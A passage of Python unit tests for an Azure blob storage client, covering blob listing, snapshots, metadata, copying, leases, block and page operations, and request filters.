    for blob_name in ('bloba1', 'bloba2', 'bloba3', 'blobb1'):
        self.bc.put_blob(self.container_name, blob_name, data, 'BlockBlob')
    listed = self.bc.list_blobs(self.container_name, None, None, 2)
    self.assertIsNotNone(listed)
    self.assertEqual(len(listed), 2)
    self.assertNamedItemInContainer(listed, 'bloba1')
    self.assertNamedItemInContainer(listed, 'bloba2')
def test_list_blobs_with_maxresults_and_marker(self):
    """next_marker resumes a paged blob listing where it stopped."""
    self._create_container(self.container_name)
    data = 'hello world'
    for blob_name in ('bloba1', 'bloba2', 'bloba3', 'blobb1'):
        self.bc.put_blob(self.container_name, blob_name, data, 'BlockBlob')
    first_page = self.bc.list_blobs(self.container_name, None, None, 2)
    second_page = self.bc.list_blobs(self.container_name, None, first_page.next_marker, 2)
    self.assertEqual(len(first_page), 2)
    self.assertEqual(len(second_page), 2)
    self.assertNamedItemInContainer(first_page, 'bloba1')
    self.assertNamedItemInContainer(first_page, 'bloba2')
    self.assertNamedItemInContainer(second_page, 'bloba3')
    self.assertNamedItemInContainer(second_page, 'blobb1')
def test_list_blobs_with_include_snapshots(self):
    """include='snapshots' lists the snapshot before its base blob."""
    self._create_container(self.container_name)
    data = 'hello world'
    self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
    self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob')
    self.bc.snapshot_blob(self.container_name, 'blob1')
    listed = self.bc.list_blobs(self.container_name, include='snapshots')
    self.assertEqual(len(listed), 3)
    self.assertEqual(listed[0].name, 'blob1')
    self.assertNotEqual(listed[0].snapshot, '')
    self.assertEqual(listed[1].name, 'blob1')
    self.assertEqual(listed[1].snapshot, '')
    self.assertEqual(listed[2].name, 'blob2')
    self.assertEqual(listed[2].snapshot, '')
def test_list_blobs_with_include_metadata(self):
    """include='metadata' returns per-blob metadata and omits snapshots."""
    self._create_container(self.container_name)
    data = 'hello world'
    self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'foo':'1','bar':'bob'})
    self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob', x_ms_meta_name_values={'foo':'2','bar':'car'})
    self.bc.snapshot_blob(self.container_name, 'blob1')
    listed = self.bc.list_blobs(self.container_name, include='metadata')
    self.assertEqual(len(listed), 2)
    self.assertEqual(listed[0].name, 'blob1')
    self.assertEqual(listed[0].metadata['foo'], '1')
    self.assertEqual(listed[0].metadata['bar'], 'bob')
    self.assertEqual(listed[1].name, 'blob2')
    self.assertEqual(listed[1].metadata['foo'], '2')
    self.assertEqual(listed[1].metadata['bar'], 'car')
def test_list_blobs_with_include_uncommittedblobs(self):
    """include='uncommittedblobs' surfaces blobs with only staged blocks."""
    self._create_container(self.container_name)
    data = 'hello world'
    # blob1 has staged blocks but no commit, so it is uncommitted.
    self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
    self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
    self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
    self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob', x_ms_meta_name_values={'foo':'2','bar':'car'})
    listed = self.bc.list_blobs(self.container_name, include='uncommittedblobs')
    self.assertEqual(len(listed), 2)
    self.assertEqual(listed[0].name, 'blob1')
    self.assertEqual(listed[1].name, 'blob2')
def test_list_blobs_with_include_copy(self):
    """include='copy' exposes copy_* properties on a copied blob."""
    self._create_container(self.container_name)
    data = 'hello world'
    self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'status':'original'})
    source_url = 'https://%s.blob.core.windows.net/%s/%s' % (credentials.getStorageServicesName(),
                                                             self.container_name,
                                                             'blob1')
    self.bc.copy_blob(self.container_name, 'blob1copy', source_url, {'status':'copy'})
    listed = self.bc.list_blobs(self.container_name, include='copy')
    self.assertEqual(len(listed), 2)
    self.assertEqual(listed[0].name, 'blob1')
    copied = listed[1]
    self.assertEqual(copied.name, 'blob1copy')
    self.assertEqual(copied.properties.content_length, 11)
    self.assertEqual(copied.properties.content_type, 'application/octet-stream Charset=UTF-8')
    self.assertEqual(copied.properties.content_encoding, '')
    self.assertEqual(copied.properties.content_language, '')
    self.assertNotEqual(copied.properties.content_md5, '')
    self.assertEqual(copied.properties.blob_type, 'BlockBlob')
    self.assertEqual(copied.properties.lease_status, 'unlocked')
    self.assertEqual(copied.properties.lease_state, 'available')
    self.assertNotEqual(copied.properties.copy_id, '')
    self.assertEqual(copied.properties.copy_source, source_url)
    self.assertEqual(copied.properties.copy_status, 'success')
    self.assertEqual(copied.properties.copy_progress, '11/11')
    self.assertNotEqual(copied.properties.copy_completion_time, '')
def test_list_blobs_with_include_multiple(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'foo':'1','bar':'bob'})
self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob', x_ms_meta_name_values={'foo':'2','bar':'car'})
self.bc.snapshot_blob(self.container_name, 'blob1')
# Act
blobs = self.bc.list_blobs(self.container_name, include='snapshots,metadata')
# Assert
self.assertEqual(len(blobs), 3)
self.assertEqual(blobs[0].name, 'blob1')
self.assertNotEqual(blobs[0].snapshot, '')
self.assertEqual(blobs[0].metadata['foo'], '1')
self.assertEqual(blobs[0].metadata['bar'], 'bob')
self.assertEqual(blobs[1].name, 'blob1')
self.assertEqual(blobs[1].snapshot, '')
self.assertEqual(blobs[1].metadata['foo'], '1')
self.assertEqual(blobs[1].metadata['bar'], 'bob')
self.assertEqual(blobs[2].name, 'blob2')
self.assertEqual(blobs[2].snapshot, '')
self.assertEqual(blobs[2].metadata['foo'], '2')
self.assertEqual(blobs[2].metadata['bar'], 'car')
def test_put_blob_block_blob(self):
    """put_blob with 'BlockBlob' succeeds and returns None."""
    # Arrange
    self._create_container(self.container_name)
    # Act
    data = 'hello world'
    resp = self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
    # Assert
    self.assertIsNone(resp)

def test_put_blob_page_blob(self):
    """put_blob with 'PageBlob' creates an empty page blob of the given size."""
    # Arrange
    self._create_container(self.container_name)
    # Act
    resp = self.bc.put_blob(self.container_name, 'blob1', '', 'PageBlob', x_ms_blob_content_length='1024')
    # Assert
    self.assertIsNone(resp)

def test_put_blob_with_lease_id(self):
    """A leased blob can be overwritten when the matching lease id is passed."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    lease_id = lease['x-ms-lease-id']
    # Act
    data = 'hello world again'
    resp = self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_lease_id=lease_id)
    # Assert
    self.assertIsNone(resp)
    blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_lease_id=lease_id)
    self.assertEqual(blob, 'hello world again')

def test_put_blob_with_metadata(self):
    """Metadata set at put time is readable back as x-ms-meta-* headers."""
    # Arrange
    self._create_container(self.container_name)
    # Act
    data = 'hello world'
    resp = self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'hello':'world','foo':'42'})
    # Assert
    self.assertIsNone(resp)
    md = self.bc.get_blob_metadata(self.container_name, 'blob1')
    self.assertEquals(md['x-ms-meta-hello'], 'world')
    self.assertEquals(md['x-ms-meta-foo'], '42')
def test_get_blob_with_existing_blob(self):
    """get_blob returns a BlobResult that compares equal to the content."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1')
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello world')

def test_get_blob_with_snapshot(self):
    """get_blob accepts a snapshot id and returns the snapshot's content."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    snapshot = self.bc.snapshot_blob(self.container_name, 'blob1')
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1', snapshot['x-ms-snapshot'])
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello world')

def test_get_blob_with_snapshot_previous(self):
    """A snapshot keeps the old content after the base blob is overwritten."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    snapshot = self.bc.snapshot_blob(self.container_name, 'blob1')
    self.bc.put_blob(self.container_name, 'blob1', 'hello world again', 'BlockBlob')
    # Act
    blob_previous = self.bc.get_blob(self.container_name, 'blob1', snapshot['x-ms-snapshot'])
    blob_latest = self.bc.get_blob(self.container_name, 'blob1')
    # Assert
    self.assertIsInstance(blob_previous, BlobResult)
    self.assertIsInstance(blob_latest, BlobResult)
    self.assertEquals(blob_previous, 'hello world')
    self.assertEquals(blob_latest, 'hello world again')

def test_get_blob_with_range(self):
    """x_ms_range downloads only the requested byte range (inclusive)."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_range='bytes=0-5')
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello ')

def test_get_blob_with_range_and_get_content_md5(self):
    """Ranged reads can request a Content-MD5 of the returned range."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_range='bytes=0-5', x_ms_range_get_content_md5='true')
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello ')
    # Expected MD5 is the base64 digest of the 6-byte range 'hello '.
    self.assertEquals(blob.properties['content-md5'], '+BSJN3e8wilf/wXwDlCNpg==')

def test_get_blob_with_lease(self):
    """get_blob works while a lease is held when the lease id is supplied."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    lease_id = lease['x-ms-lease-id']
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_lease_id=lease_id)
    self.bc.lease_blob(self.container_name, 'blob1', 'release', lease_id)
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello world')

def test_get_blob_on_leased_blob_without_lease_id(self):
    """Reading a leased blob does not require the lease id."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1') # get_blob is allowed without lease id
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello world')

def test_get_blob_with_non_existing_container(self):
    """get_blob against a missing container raises WindowsAzureError."""
    # Arrange
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.get_blob(self.container_name, 'blob1')
    # Assert

def test_get_blob_with_non_existing_blob(self):
    """get_blob against a missing blob raises WindowsAzureError."""
    # Arrange
    self._create_container(self.container_name)
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.get_blob(self.container_name, 'blob1')
    # Assert
def test_set_blob_properties_with_existing_blob(self):
    """set_blob_properties updates a header readable via get_blob_properties."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp = self.bc.set_blob_properties(self.container_name, 'blob1', x_ms_blob_content_language='spanish')
    # Assert
    self.assertIsNone(resp)
    props = self.bc.get_blob_properties(self.container_name, 'blob1')
    self.assertEquals(props['content-language'], 'spanish')

def test_set_blob_properties_with_non_existing_container(self):
    """set_blob_properties on a missing container raises WindowsAzureError."""
    # Arrange
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.set_blob_properties(self.container_name, 'blob1', x_ms_blob_content_language='spanish')
    # Assert

def test_set_blob_properties_with_non_existing_blob(self):
    """set_blob_properties on a missing blob raises WindowsAzureError."""
    # Arrange
    self._create_container(self.container_name)
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.set_blob_properties(self.container_name, 'blob1', x_ms_blob_content_language='spanish')
    # Assert

def test_get_blob_properties_with_existing_blob(self):
    """get_blob_properties returns type, length and lease status headers."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    props = self.bc.get_blob_properties(self.container_name, 'blob1')
    # Assert
    self.assertIsNotNone(props)
    self.assertEquals(props['x-ms-blob-type'], 'BlockBlob')
    self.assertEquals(props['content-length'], '11')
    self.assertEquals(props['x-ms-lease-status'], 'unlocked')

def test_get_blob_properties_with_leased_blob(self):
    """Properties of a leased blob report locked/leased/fixed lease headers."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # NOTE(review): lease handle is intentionally not released here; the
    # container is presumably cleaned up by the fixture teardown.
    lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    # Act
    props = self.bc.get_blob_properties(self.container_name, 'blob1')
    # Assert
    self.assertIsNotNone(props)
    self.assertEquals(props['x-ms-blob-type'], 'BlockBlob')
    self.assertEquals(props['content-length'], '11')
    self.assertEquals(props['x-ms-lease-status'], 'locked')
    self.assertEquals(props['x-ms-lease-state'], 'leased')
    self.assertEquals(props['x-ms-lease-duration'], 'fixed')

def test_get_blob_properties_with_non_existing_container(self):
    """get_blob_properties on a missing container raises WindowsAzureError."""
    # Arrange
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.get_blob_properties(self.container_name, 'blob1')
    # Assert

def test_get_blob_properties_with_non_existing_blob(self):
    """get_blob_properties on a missing blob raises WindowsAzureError."""
    # Arrange
    self._create_container(self.container_name)
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.get_blob_properties(self.container_name, 'blob1')
    # Assert
def test_get_blob_metadata_with_existing_blob(self):
    """get_blob_metadata returns a (possibly empty) mapping, never None."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    md = self.bc.get_blob_metadata(self.container_name, 'blob1')
    # Assert
    self.assertIsNotNone(md)

def test_set_blob_metadata_with_existing_blob(self):
    """set_blob_metadata stores values; key names come back lower-cased."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp = self.bc.set_blob_metadata(self.container_name, 'blob1', {'hello':'world', 'foo':'42', 'UP':'UPval'})
    # Assert
    self.assertIsNone(resp)
    md = self.bc.get_blob_metadata(self.container_name, 'blob1')
    self.assertEquals(3, len(md))
    self.assertEquals(md['x-ms-meta-hello'], 'world')
    self.assertEquals(md['x-ms-meta-foo'], '42')
    # 'UP' round-trips as lower-case 'up' while the value case is preserved.
    self.assertEquals(md['x-ms-meta-up'], 'UPval')
def test_delete_blob_with_existing_blob(self):
    """delete_blob succeeds on an existing blob and returns None."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp = self.bc.delete_blob(self.container_name, 'blob1')
    # Assert
    self.assertIsNone(resp)

def test_delete_blob_with_non_existing_blob(self):
    """delete_blob on a missing blob raises WindowsAzureError."""
    # Arrange
    self._create_container(self.container_name)
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.delete_blob(self.container_name, 'blob1')
    # Assert
def test_copy_blob_with_existing_blob(self):
    """copy_blob within the same account completes synchronously with 'success'."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    # Same-account copies accept a relative '/account/container/blob' path.
    sourceblob = '/%s/%s/%s' % (credentials.getStorageServicesName(),
                                self.container_name,
                                'blob1')
    resp = self.bc.copy_blob(self.container_name, 'blob1copy', sourceblob)
    # Assert
    self.assertIsNotNone(resp)
    self.assertEquals(resp['x-ms-copy-status'], 'success')
    self.assertIsNotNone(resp['x-ms-copy-id'])
    copy = self.bc.get_blob(self.container_name, 'blob1copy')
    self.assertEquals(copy, 'hello world')
# TODO:
# We need to find out how to get azure to make the copy asynchronously.
# It seems like no matter how big the blob is (60GB), the copy is always
# synchronous - even going cross account and making several consecutive copies.
#def test_abort_copy_blob(self):
# # Arrange
# self._create_container(self.container_name)
# source_container_name = 'sourcecontainer'
# source_blob_name = 'sourceblob'
# if not self._blob_exists(source_container_name, source_blob_name):
# self._create_container_and_block_blob_with_random_data(source_container_name, source_blob_name, 500, 4 * 1024 * 1024)
# source_blob_url = self.bc.make_blob_url(source_container_name, source_blob_name)
# # Act
# success = False
# for i in range(0, 50):
# target_blob_name = 'targetblob{0}'.format(i)
# copy_resp = self.bc.copy_blob(self.container_name, target_blob_name, source_blob_url)
# if copy_resp['x-ms-copy-status'] == 'pending':
#            self.bc.abort_copy_blob(self.container_name, target_blob_name, copy_resp['x-ms-copy-id'])
# success = True
# break
# # Assert
# self.assertTrue(success)
def test_abort_copy_blob_with_synchronous_copy_fails(self):
    """Aborting an already-completed (synchronous) copy raises an error."""
    # Arrange
    source_blob_name = 'sourceblob'
    self._create_container_and_block_blob(self.container_name, source_blob_name, 'hello world')
    source_blob_url = self.bc.make_blob_url(self.container_name, source_blob_name)
    # Act
    target_blob_name = 'targetblob'
    copy_resp = self.bc.copy_blob(self.container_name, target_blob_name, source_blob_url)
    # The copy finished synchronously, so abort has nothing to cancel.
    with self.assertRaises(WindowsAzureError):
        self.bc.abort_copy_blob(self.container_name, target_blob_name, copy_resp['x-ms-copy-id'])
    # Assert
    self.assertEquals(copy_resp['x-ms-copy-status'], 'success')
def test_snapshot_blob(self):
    """snapshot_blob returns headers including the new snapshot id."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp = self.bc.snapshot_blob(self.container_name, 'blob1')
    # Assert
    self.assertIsNotNone(resp)
    self.assertIsNotNone(resp['x-ms-snapshot'])
def test_lease_blob_acquire_and_release(self):
    """A released lease can be re-acquired immediately."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'release', resp1['x-ms-lease-id'])
    resp3 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    # Assert
    self.assertIsNotNone(resp1)
    self.assertIsNotNone(resp2)
    self.assertIsNotNone(resp3)

def test_lease_blob_with_duration(self):
    """A fixed-duration lease expires: writes fail after the duration passes."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire', x_ms_lease_duration=15)
    resp2 = self.bc.put_blob(self.container_name, 'blob1', 'hello 2', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
    # Wait for the 15-second lease to expire before trying again.
    time.sleep(15)
    with self.assertRaises(WindowsAzureError):
        self.bc.put_blob(self.container_name, 'blob1', 'hello 3', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
    # Assert
    self.assertIsNotNone(resp1)
    self.assertIsNone(resp2)

def test_lease_blob_with_proposed_lease_id(self):
    """The service honours a caller-proposed lease id on acquire."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    lease_id = 'a0e6c241-96ea-45a3-a44b-6ae868bc14d0'
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire', x_ms_proposed_lease_id=lease_id)
    # Assert
    self.assertIsNotNone(resp1)
    self.assertEquals(resp1['x-ms-lease-id'], lease_id)

def test_lease_blob_change_lease_id(self):
    """'change' swaps an active lease to a newly proposed id."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    lease_id = 'a0e6c241-96ea-45a3-a44b-6ae868bc14d0'
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'change', x_ms_lease_id=resp1['x-ms-lease-id'], x_ms_proposed_lease_id=lease_id)
    # Assert
    self.assertIsNotNone(resp1)
    self.assertIsNotNone(resp2)
    self.assertNotEquals(resp1['x-ms-lease-id'], lease_id)
    self.assertEquals(resp2['x-ms-lease-id'], lease_id)

def test_lease_blob_renew_released_lease_fails(self):
    """Renewing a lease after release raises WindowsAzureConflictError."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'release', resp1['x-ms-lease-id'])
    with self.assertRaises(WindowsAzureConflictError):
        self.bc.lease_blob(self.container_name, 'blob1', 'renew', resp1['x-ms-lease-id'])
    # Assert
    self.assertIsNotNone(resp1)
    self.assertIsNotNone(resp2)

def test_lease_blob_break_period(self):
    """During the break period the lease id still works; after it, writes fail."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire', x_ms_lease_duration=15)
    resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'break', resp1['x-ms-lease-id'], x_ms_lease_break_period=5)
    resp3 = self.bc.put_blob(self.container_name, 'blob1', 'hello 2', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
    # Wait out the 5-second break period.
    time.sleep(5)
    with self.assertRaises(WindowsAzureError):
        self.bc.put_blob(self.container_name, 'blob1', 'hello 3', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
    # Assert
    self.assertIsNotNone(resp1)
    self.assertIsNotNone(resp2)
    self.assertIsNone(resp3)

def test_lease_blob_break_released_lease_fails(self):
    """Breaking a lease that was already released raises a conflict."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    self.bc.lease_blob(self.container_name, 'blob1', 'release', lease['x-ms-lease-id'])
    # Act
    with self.assertRaises(WindowsAzureConflictError):
        self.bc.lease_blob(self.container_name, 'blob1', 'break', lease['x-ms-lease-id'])
    # Assert

def test_lease_blob_acquire_after_break_fails(self):
    """A new acquire conflicts while a break is still in progress."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    self.bc.lease_blob(self.container_name, 'blob1', 'break', lease['x-ms-lease-id'])
    # Act
    with self.assertRaises(WindowsAzureConflictError):
        self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    # Assert

def test_lease_blob_acquire_and_renew(self):
    """An active lease can be renewed with its own id."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    # Act
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'renew', resp1['x-ms-lease-id'])
    # Assert
    self.assertIsNotNone(resp1)
    self.assertIsNotNone(resp2)

def test_lease_blob_acquire_twice_fails(self):
    """A second acquire without the lease id fails; the holder can release."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
    resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    # Act
    with self.assertRaises(WindowsAzureError):
        self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'release', resp1['x-ms-lease-id'])
    # Assert
    self.assertIsNotNone(resp1)
    self.assertIsNotNone(resp2)
def test_put_block(self):
    """put_block accepts multiple uncommitted blocks and returns None each time."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', '')
    # Act
    for i in xrange(5):
        resp = self.bc.put_block(self.container_name,
                                 'blob1',
                                 'block %d' % (i),
                                 str(i))
        self.assertIsNone(resp)
    # Assert

def test_put_block_list(self):
    """put_block_list commits staged blocks in order into the blob body."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', '')
    self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
    self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
    self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
    # Act
    resp = self.bc.put_block_list(self.container_name, 'blob1', ['1', '2', '3'])
    # Assert
    self.assertIsNone(resp)
    blob = self.bc.get_blob(self.container_name, 'blob1')
    self.assertEqual(blob, 'AAABBBCCC')

def test_get_block_list_no_blocks(self):
    """get_block_list on an empty blob reports zero blocks in both lists."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', '')
    # Act
    block_list = self.bc.get_block_list(self.container_name, 'blob1', None, 'all')
    # Assert
    self.assertIsNotNone(block_list)
    self.assertIsInstance(block_list, BlobBlockList)
    self.assertEquals(len(block_list.uncommitted_blocks), 0)
    self.assertEquals(len(block_list.committed_blocks), 0)

def test_get_block_list_uncommitted_blocks(self):
    """Blocks staged but not committed appear only in the uncommitted list."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', '')
    self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
    self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
    self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
    # Act
    block_list = self.bc.get_block_list(self.container_name, 'blob1', None, 'all')
    # Assert
    self.assertIsNotNone(block_list)
    self.assertIsInstance(block_list, BlobBlockList)
    self.assertEquals(len(block_list.uncommitted_blocks), 3)
    self.assertEquals(len(block_list.committed_blocks), 0)

def test_get_block_list_committed_blocks(self):
    """After put_block_list, blocks move to the committed list."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', '')
    self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
    self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
    self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
    self.bc.put_block_list(self.container_name, 'blob1', ['1', '2', '3'])
    # Act
    block_list = self.bc.get_block_list(self.container_name, 'blob1', None, 'all')
    # Assert
    self.assertIsNotNone(block_list)
    self.assertIsInstance(block_list, BlobBlockList)
    self.assertEquals(len(block_list.uncommitted_blocks), 0)
    self.assertEquals(len(block_list.committed_blocks), 3)
def test_put_page_update(self):
    """put_page 'update' writes one 512-byte page and returns None."""
    # Arrange
    self._create_container_and_page_blob(self.container_name, 'blob1', 1024)
    # Act
    # 16 chars * 32 = 512 bytes, exactly one page.
    data = 'abcdefghijklmnop' * 32
    resp = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=0-511', 'update')
    # Assert
    self.assertIsNone(resp)

def test_put_page_clear(self):
    """put_page 'clear' zeroes a page range with an empty body."""
    # Arrange
    self._create_container_and_page_blob(self.container_name, 'blob1', 1024)
    # Act
    resp = self.bc.put_page(self.container_name, 'blob1', '', 'bytes=0-511', 'clear')
    # Assert
    self.assertIsNone(resp)

def test_get_page_ranges_no_pages(self):
    """A fresh page blob has no valid page ranges."""
    # Arrange
    self._create_container_and_page_blob(self.container_name, 'blob1', 1024)
    # Act
    ranges = self.bc.get_page_ranges(self.container_name, 'blob1')
    # Assert
    self.assertIsNotNone(ranges)
    self.assertIsInstance(ranges, PageList)
    self.assertEquals(len(ranges.page_ranges), 0)

def test_get_page_ranges_2_pages(self):
    """Two non-adjacent updated pages are reported as two separate ranges."""
    # Arrange
    self._create_container_and_page_blob(self.container_name, 'blob1', 2048)
    data = 'abcdefghijklmnop' * 32
    resp1 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=0-511', 'update')
    resp2 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=1024-1535', 'update')
    # Act
    ranges = self.bc.get_page_ranges(self.container_name, 'blob1')
    # Assert
    self.assertIsNotNone(ranges)
    self.assertIsInstance(ranges, PageList)
    self.assertEquals(len(ranges.page_ranges), 2)
    self.assertEquals(ranges.page_ranges[0].start, 0)
    self.assertEquals(ranges.page_ranges[0].end, 511)
    self.assertEquals(ranges.page_ranges[1].start, 1024)
    self.assertEquals(ranges.page_ranges[1].end, 1535)

def test_get_page_ranges_iter(self):
    """PageList supports direct iteration, len() and indexing."""
    # Arrange
    self._create_container_and_page_blob(self.container_name, 'blob1', 2048)
    data = 'abcdefghijklmnop' * 32
    resp1 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=0-511', 'update')
    resp2 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=1024-1535', 'update')
    # Act
    ranges = self.bc.get_page_ranges(self.container_name, 'blob1')
    for range in ranges:
        pass
    # Assert
    self.assertEquals(len(ranges), 2)
    self.assertIsInstance(ranges[0], PageRange)
    self.assertIsInstance(ranges[1], PageRange)
def test_with_filter(self):
    """with_filter wraps requests; chained filters run outermost-last (b then a)."""
    # Single filter
    called = []
    def my_filter(request, next):
        # Validate the shapes of the request/response objects that flow
        # through a filter, then forward to the next handler.
        called.append(True)
        self.assertIsInstance(request, HTTPRequest)
        for header in request.headers:
            self.assertIsInstance(header, tuple)
            for item in header:
                self.assertIsInstance(item, (str, unicode, type(None)))
        self.assertIsInstance(request.host, (str, unicode))
        self.assertIsInstance(request.method, (str, unicode))
        self.assertIsInstance(request.path, (str, unicode))
        self.assertIsInstance(request.query, list)
        self.assertIsInstance(request.body, (str, unicode))
        response = next(request)
        self.assertIsInstance(response, HTTPResponse)
        self.assertIsInstance(response.body, (str, type(None)))
        self.assertIsInstance(response.headers, list)
        for header in response.headers:
            self.assertIsInstance(header, tuple)
            for item in header:
                self.assertIsInstance(item, (str, unicode))
        self.assertIsInstance(response.status, int)
        return response
    bc = self.bc.with_filter(my_filter)
    bc.create_container(self.container_name + '0', None, None, False)
    self.assertTrue(called)
    del called[:]
    bc.delete_container(self.container_name + '0')
    self.assertTrue(called)
    del called[:]
    # Chained filters
    def filter_a(request, next):
        called.append('a')
        return next(request)
    def filter_b(request, next):
        called.append('b')
        return next(request)
    # The last filter added is the first one invoked.
